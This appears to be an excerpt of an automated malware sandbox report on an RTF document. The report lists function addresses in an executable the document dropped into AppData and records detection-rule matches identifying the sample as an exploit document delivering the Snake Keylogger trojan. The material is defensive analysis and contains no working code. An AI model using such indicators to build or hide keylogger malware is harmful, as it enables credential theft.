                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00633BA07_2_00633BA0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00636DA07_2_00636DA0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006357B07_2_006357B0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00631F807_2_00631F80
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006351807_2_00635180
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006383807_2_00638380
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006309907_2_00630990
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006482B07_2_006482B0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006487677_2_00648767
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006437607_2_00643760
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00649F607_2_00649F60
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006409607_2_00640960
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006477607_2_00647760
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006420687_2_00642068
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064CA687_2_0064CA68
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006460687_2_00646068
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006409707_2_00640970
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006477707_2_00647770
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064F5707_2_0064F570
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006449707_2_00644970
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064B2727_2_0064B272
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006460787_2_00646078
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006487787_2_00648778
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064DD787_2_0064DD78
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006400407_2_00640040
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00646E407_2_00646E40
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00648C407_2_00648C40
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006440407_2_00644040
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00649F4F7_2_00649F4F
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006457487_2_00645748
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064B7487_2_0064B748
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006440507_2_00644050
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064E2507_2_0064E250
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006437527_2_00643752
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064CF207_2_0064CF20
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064A4287_2_0064A428
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064FA287_2_0064FA28
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064B7377_2_0064B737
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00642E307_2_00642E30
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064CF307_2_0064CF30
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00648C317_2_00648C31
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00646E327_2_00646E32
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064E23F7_2_0064E23F
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006417387_2_00641738
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064FA387_2_0064FA38
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006457397_2_00645739
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006425007_2_00642500
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006465007_2_00646500
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00640E087_2_00640E08
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00647C087_2_00647C08
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006491087_2_00649108
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00644E097_2_00644E09
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064E70A7_2_0064E70A
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006465107_2_00646510
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064BC107_2_0064BC10
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00644E187_2_00644E18
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064E7187_2_0064E718
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064A4187_2_0064A418
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00645BE07_2_00645BE0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064EBE07_2_0064EBE0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064A8E07_2_0064A8E0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006444E87_2_006444E8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064D3E87_2_0064D3E8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064A8F07_2_0064A8F0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006490FC7_2_006490FC
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064D3F87_2_0064D3F8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00640DF87_2_00640DF8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00647BF87_2_00647BF8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064D8C07_2_0064D8C0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006495C07_2_006495C0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064EBCF7_2_0064EBCF
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006432C87_2_006432C8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006472C97_2_006472C9
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00641BD07_2_00641BD0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006495D07_2_006495D0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00645BD07_2_00645BD0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006404D87_2_006404D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006472D87_2_006472D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064C0D87_2_0064C0D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006444D87_2_006444D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006412A07_2_006412A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064C5A07_2_0064C5A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006452A17_2_006452A1
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064D8AF7_2_0064D8AF
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006469A87_2_006469A8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064F0A87_2_0064F0A8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064ADA87_2_0064ADA8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00643BAA7_2_00643BAA
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006452B07_2_006452B0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00643BB87_2_00643BB8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064ADB87_2_0064ADB8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006449807_2_00644980
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064B2807_2_0064B280
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00649A8C7_2_00649A8C
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064DD887_2_0064DD88
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064C5907_2_0064C590
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006429987_2_00642998
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00649A987_2_00649A98
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064F0987_2_0064F098
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0064699A7_2_0064699A
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072A1207_2_0072A120
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_007226707_2_00722670
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072C0607_2_0072C060
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072F2607_2_0072F260
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072D6407_2_0072D640
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072A4407_2_0072A440
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_007200407_2_00720040
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072F24F7_2_0072F24F
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072BA207_2_0072BA20
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072EC207_2_0072EC20
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_007218287_2_00721828
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_007230107_2_00723010
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_007200147_2_00720014
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072D0007_2_0072D000
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00721CF07_2_00721CF0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_007204F87_2_007204F8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072CCE07_2_0072CCE0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072CCD27_2_0072CCD2
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_007234D87_2_007234D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072E2C07_2_0072E2C0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072B0C07_2_0072B0C0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072C6A07_2_0072C6A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072F8A07_2_0072F8A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00720E987_2_00720E98
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072AA807_2_0072AA80
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_007226807_2_00722680
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072DC807_2_0072DC80
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00720E877_2_00720E87
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072A7607_2_0072A760
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_007213607_2_00721360
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072D9607_2_0072D960
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072A7507_2_0072A750
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072BD407_2_0072BD40
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072EF407_2_0072EF40
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00722B487_2_00722B48
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072D3207_2_0072D320
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072B7007_2_0072B700
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072E9007_2_0072E900
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_007205087_2_00720508
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072E5E07_2_0072E5E0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072B3E07_2_0072B3E0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_007209D07_2_007209D0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_007209C27_2_007209C2
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072C9C07_2_0072C9C0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072FBC07_2_0072FBC0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_007221B87_2_007221B8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072ADA07_2_0072ADA0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_007239A07_2_007239A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072DFA07_2_0072DFA0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_007221A87_2_007221A8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072C3807_2_0072C380
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0072F5807_2_0072F580
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC53307_2_00BC5330
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCE9787_2_00BCE978
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC00407_2_00BC0040
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCBBB87_2_00BCBBB8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC34B97_2_00BC34B9
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC98B07_2_00BC98B0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCAEB07_2_00BCAEB0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCF2A87_2_00BCF2A8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC8BA87_2_00BC8BA8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC7EA07_2_00BC7EA0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC98A27_2_00BC98A2
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC7E9F7_2_00BC7E9F
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC71987_2_00BC7198
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC8B987_2_00BC8B98
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC64907_2_00BC6490
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC57887_2_00BC5788
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCDE887_2_00BCDE88
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC71887_2_00BC7188
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCD1807_2_00BCD180
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC4A807_2_00BC4A80
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC64807_2_00BC6480
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC82F87_2_00BC82F8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC75F07_2_00BC75F0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC8FF07_2_00BC8FF0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC68E87_2_00BC68E8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC5BE07_2_00BC5BE0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCE4E07_2_00BCE4E0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC4ED87_2_00BC4ED8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCD5D87_2_00BCD5D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCFBD87_2_00BCFBD8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC68DA7_2_00BC68DA
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCC8D07_2_00BCC8D0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC41D07_2_00BC41D0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC5BD27_2_00BC5BD2
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC4ECE7_2_00BC4ECE
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCBBC87_2_00BCBBC8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC34C87_2_00BC34C8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCAEC07_2_00BCAEC0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC41C07_2_00BC41C0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCC8C17_2_00BCC8C1
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC7A3E7_2_00BC7A3E
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC60387_2_00BC6038
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCDA307_2_00BCDA30
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC6D307_2_00BC6D30
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCF7317_2_00BCF731
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCCD287_2_00BCCD28
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC46287_2_00BC4628
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC60287_2_00BC6028
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC53267_2_00BC5326
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCC0207_2_00BCC020
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC39207_2_00BC3920
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCB3187_2_00BCB318
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC461A7_2_00BC461A
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCEE107_2_00BCEE10
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC39107_2_00BC3910
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCC0107_2_00BCC010
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC9D087_2_00BC9D08
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCB3087_2_00BCB308
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC00067_2_00BC0006
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC90007_2_00BC9000
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC3D787_2_00BC3D78
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCC4787_2_00BCC478
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC57787_2_00BC5778
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCDE787_2_00BCDE78
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCB7707_2_00BCB770
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC30707_2_00BC3070
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC4A707_2_00BC4A70
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCAA687_2_00BCAA68
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCC4687_2_00BCC468
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC3D697_2_00BC3D69
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCB7607_2_00BCB760
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC305F7_2_00BC305F
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC94587_2_00BC9458
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCAA597_2_00BCAA59
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC87507_2_00BC8750
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC7A487_2_00BC7A48
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC94487_2_00BC9448
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BCF7407_2_00BCF740
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC6D407_2_00BC6D40
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00BC87407_2_00BC8740
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00C350D87_2_00C350D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00C349F87_2_00C349F8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00C357B87_2_00C357B8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00C300407_2_00C30040
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00C335587_2_00C33558
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00C32E787_2_00C32E78
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00C343187_2_00C34318
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00C33C387_2_00C33C38
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00C350C87_2_00C350C8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00C30ED87_2_00C30ED8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00C349E97_2_00C349E9
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00C32AF17_2_00C32AF1
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00C357A87_2_00C357A8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00C3354B7_2_00C3354B
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00C32E687_2_00C32E68
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00C32B007_2_00C32B00
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00C343087_2_00C34308
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00C321217_2_00C32121
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00C33C287_2_00C33C28
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_00C321307_2_00C32130
                  Source: na.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: 7.2.cdlpohalgate39567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
